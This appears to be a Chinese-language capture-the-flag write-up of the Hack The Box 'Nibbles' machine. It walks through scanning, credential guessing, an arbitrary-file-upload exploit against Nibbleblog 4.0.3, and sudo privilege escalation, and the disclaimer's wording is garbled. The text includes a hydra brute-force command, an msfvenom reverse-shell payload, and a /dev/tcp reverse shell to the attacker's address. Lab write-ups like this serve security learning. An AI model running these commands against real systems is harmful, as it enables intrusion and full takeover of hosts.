免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(root💀kali)-[~/htb/Nibbles]
└─# nmap -sC -sV 10.10.10.75
Starting Nmap 7.91 (https://nmap.org) at 2021-12-11 03:53 EST
Nmap scan report for 10.10.10.75
Host is up (0.26s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds
目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.75
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.75/_21-12-11_03-56-40.txt
Error Log: /root/dirsearch/logs/errors-21-12-11_03-56-40.log
Target: http://10.10.10.75/
[03:56:41] Starting:
[03:57:40] 200 - 93B - /index.html
只有一个 index 页面,关上页面显示
Hello world!
查看网页源代码,有一行正文
/nibbleblog/ directory. Nothing interesting here!
关上 /nibbleblog/
显示一个博客
python3 dirsearch.py -e* -t 100 -u http://10.10.10.75/nibbleblog
再次爆破这个博客的目录
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.75/nibbleblog
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.75/-nibbleblog_21-12-11_04-05-45.txt
Error Log: /root/dirsearch/logs/errors-21-12-11_04-05-45.log
Target: http://10.10.10.75/nibbleblog/
[04:05:46] Starting:
[04:06:06] 200 - 1KB - /nibbleblog/COPYRIGHT.txt
[04:06:08] 200 - 5KB - /nibbleblog/README
[04:06:10] 200 - 34KB - /nibbleblog/LICENSE.txt
[04:06:11] 301 - 321B - /nibbleblog/admin -> http://10.10.10.75/nibbleblog/admin/
[04:06:12] 200 - 1KB - /nibbleblog/admin.php
[04:06:12] 403 - 312B - /nibbleblog/admin/.htaccess
[04:06:12] 200 - 2KB - /nibbleblog/admin/
[04:06:12] 200 - 2KB - /nibbleblog/admin/?/login
[04:06:13] 200 - 2KB - /nibbleblog/admin/js/tinymce/
[04:06:13] 301 - 332B - /nibbleblog/admin/js/tinymce -> http://10.10.10.75/nibbleblog/admin/js/tinymce/
[04:06:29] 400 - 303B - /nibbleblog/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[04:06:33] 200 - 1KB - /nibbleblog/content/
[04:06:33] 301 - 323B - /nibbleblog/content -> http://10.10.10.75/nibbleblog/content/
[04:06:44] 200 - 3KB - /nibbleblog/index.php
[04:06:44] 200 - 3KB - /nibbleblog/index.php/login/
[04:06:44] 200 - 78B - /nibbleblog/install.php
[04:06:46] 301 - 325B - /nibbleblog/languages -> http://10.10.10.75/nibbleblog/languages/
[04:07:01] 301 - 323B - /nibbleblog/plugins -> http://10.10.10.75/nibbleblog/plugins/
[04:07:02] 200 - 4KB - /nibbleblog/plugins/
[04:07:17] 200 - 2KB - /nibbleblog/themes/
[04:07:17] 301 - 322B - /nibbleblog/themes -> http://10.10.10.75/nibbleblog/themes/
[04:07:18] 200 - 2KB - /nibbleblog/update.php
这次信息挺丰盛,一个个剖析
README 文件暴露出 cms 版本
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
admin 模块看名字应该是治理登录页面,然而配置谬误,当初能够遍历目录里的所有文件,外面各种 .bit
文件查看网页源代码时甚至能够看到 php 源代码
admin.php 是登录页面
content 模块也有文件遍历,user.xml 文件暴露出一个用户名admin
, 然而找不到明码
如果尝试用上面的命令爆破
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^&login=Login:Incorrect username or password.”
会触发一个 web 爱护
Nibbleblog security error – Blacklist protection
下面这条爱护规定在/nibbleblog/admin/boot/rules/4-blacklist.bit
if($_DB_USERS->blacklist())
exit('Nibbleblog security error - Blacklist protection');
所以如同不能爆破。
找到一个 config 文件/nibbleblog/content/private/config.xml
然而没有暴露出明码,然而有一个 email:admin@nibbles.com
咱们猜想是登录的账号是 admin,而后应用公司名 nibbles 登录,发现这个正是明码
取得 cms 登录凭证:admin:nibbles
当初咱们有了 cms 的名字,版本号,曾经登录账号,kali 搜寻这个 cms 的利用 exp
┌──(root💀kali)-[~/htb/Nibbles]
└─# searchsploit nibbleblog 4.0.3 130 ⨯
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
初始 shell
这个 payload 要应用 Metasploit,然而我不想应用这个工具。依据破绽编号,我在 github 上找到了这个 python 版本的 exp
依照阐明
- 先编译一个 payload, 保留在 nibble.txt
msfvenom -p php/reverse_perl –format raw -o nibble.txt LHOST=10.10.14.3 LPORT=4444
-
批改 exp 外面的这几行代码,保留
nibbleUsername = "admin" nibblePassword = "nibbles" nibbleURL = "http://10.10.10.75/nibbleblog/"
-
开启监听
nc -lnvp 4444
-
执行攻打
┌──(root💀kali)-[~/htb/Nibbles] └─# python exp.py [-] LOGIN RESPONSE: 200 OK [+] Login Successful. [-] Upload likely successful. [-] UPLOAD RESPONSE: 200 OK [+] Exploit launched, check for shell. [-] EXPLOIT RESPONSE: 200 OK
-
收到反弹 shell
┌──(root💀kali)-[~/htb/Nibbles] └─# nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.75] 37284 id uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) whoami nibbler
提权
查看 sudo 特权
nibbler@Nibbles:/home$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
能够执行一个叫 monitor.sh 的文件
然而这个文件在零碎中是不存在的
nibbler@Nibbles:/home$ cat /home/nibbler/personal/stuff/monitor.sh
cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
所以思路很简略,咱们创立这个文件,而后反弹一个 root shell
-
筹备 monitor.sh 的内容为:
#!/bin/bash 0<&196;exec 196<>/dev/tcp/10.10.14.3/4242; sh <&196 >&196 2>&196
-
kali 开启一个新的监听
nc -lnvp 4242
-
sudo 执行
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh <er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh /home/nibbler/personal/stuff/monitor.sh: line 2: 196: Bad file descriptor
-
收到 root 权限反弹
┌──(root💀kali)-[~/htb/Nibbles] └─# nc -lnvp 4242 1 ⨯ listening on [any] 4242 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.75] 43962 id uid=0(root) gid=0(root) groups=0(root) whoami root